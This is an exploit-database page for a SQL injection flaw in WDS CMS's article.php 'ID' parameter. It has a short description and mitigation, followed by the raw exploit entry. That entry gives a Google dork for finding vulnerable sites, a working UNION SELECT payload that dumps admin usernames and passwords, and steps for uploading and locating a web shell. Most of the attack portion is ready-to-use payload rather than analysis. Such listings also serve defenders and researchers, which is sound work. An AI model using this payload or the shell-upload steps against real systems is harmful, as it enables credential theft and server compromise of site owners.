header-logo
Suggest Exploit
vendor:
WDS CMS
by:
Ismail Marzouk
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: WDS CMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7
2015

WDS CMS – SQL Injection

The vulnerability exists due to insufficient filtration of user-supplied input passed via the 'ID' parameter to '/wds_news/article.php' script. A remote attacker can execute arbitrary SQL commands in application's database and gain access to sensitive data. An attacker can also upload a malicious file and execute it in the context of the webserver process.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also use a least privilege approach when connecting to the database.
Source

Exploit-DB raw data:

# ( In The Name Of ALLAH )
# Exploit Title : WDS CMS - SQL Injection
# Google Dork : allinurl:wds_news/article.php?ID=
# Date : 2015-08-09
# Exploit Author : Ismail Marzouk
# Vendor Homepage : http://webdesignskolan.se/
# Tested on : Windows 7

Exploit : http://
[Target]/wds_news/article.php?ID=-1+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10+from+cms_admin--

Upload Shell : http://[Target]/wds_news/admin.php?mode=list_file

Shell Path :  http://[Target]/wds_news/filer/shell.php


# #### #### #### #### #### #### #### #### #
# Facebook Profile : www.fb.com/ism.marzouk
# #### #### #### #### #### #### #### #### #

Good Luck ^__^